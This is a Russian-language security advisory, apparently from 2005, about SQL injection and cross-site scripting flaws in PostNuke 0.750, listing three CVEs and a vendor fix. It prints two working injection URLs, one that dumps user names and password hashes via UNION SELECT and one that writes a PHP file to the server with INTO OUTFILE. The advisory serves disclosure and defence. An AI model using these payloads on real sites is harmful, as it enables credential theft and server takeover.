SQL-инъекция и межсайтовый скриптинг в PostNuke

Дата публикации:
01.03.2005
Дата изменения:
17.10.2006
Всего просмотров:
1051
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-0615
CVE-2005-0616
CVE-2005-0617
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PostNuke 0.x
Уязвимые версии: PostNuke 0.750

Описание:
Уязвимость позволяет злоумышленнику выполнить произвольные SQL команды в базе данных приложения, загрузить и выполнить произвольные файлы и произвести XSS нападение.

1. Уязвимость в функции getArticles() сценария modules/News/funcs.php существует из-за некорректной обработки данных в параметре catid и позволяет злоумышленнику произвести SQL-инъекцию. Пример:

http://[HOST]/[DIR]/modules.php?op=modload&name=NS-Polls&file=
index&req=results&pollID=2&mode=thread&order=0&thold=0&catid=
-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,
pn_uname,pn_uname,null,null,null,pn_uname, pn_uname,pn_uname,pn_uname, pn_uname,null,pn_pass,null,null,null,null, null,null%20FROM%20
[$PREFIX]users%20WHERE%20pn_uid=2/*

2. Уязвимость обнаружена в функции search() сценария modules/Downloads/dl-search.php. Удаленный пользователь может произвести SQL-инъекцию.

http://[HOST]/[DIR]/index.php?name=Downloads
&req=search&query=[Program name]&show=10
%20INTO%20OUTFILE%20'/[PATH]/pnTemp/Xanthia_cache/cXIb8O3.php'/*

3. Межсайтовый скриптинг существует из-за некорректно обработки входных данных в модуле Download. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы.

Пример/Эксплоит: Более подробно о реализации уязвимостей см. источник сообщения.

URL производителя: http://news.postnuke.com

Решение: Установите обновления с сайта производителя.

Ссылки: PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1
PostNuke Critical XSS 0.760-RC2=>x cXIb8O3.2
PostNuke SQL Injection 0.760-RC2=>x cXIb8O3.3

или введите имя

CAPTCHA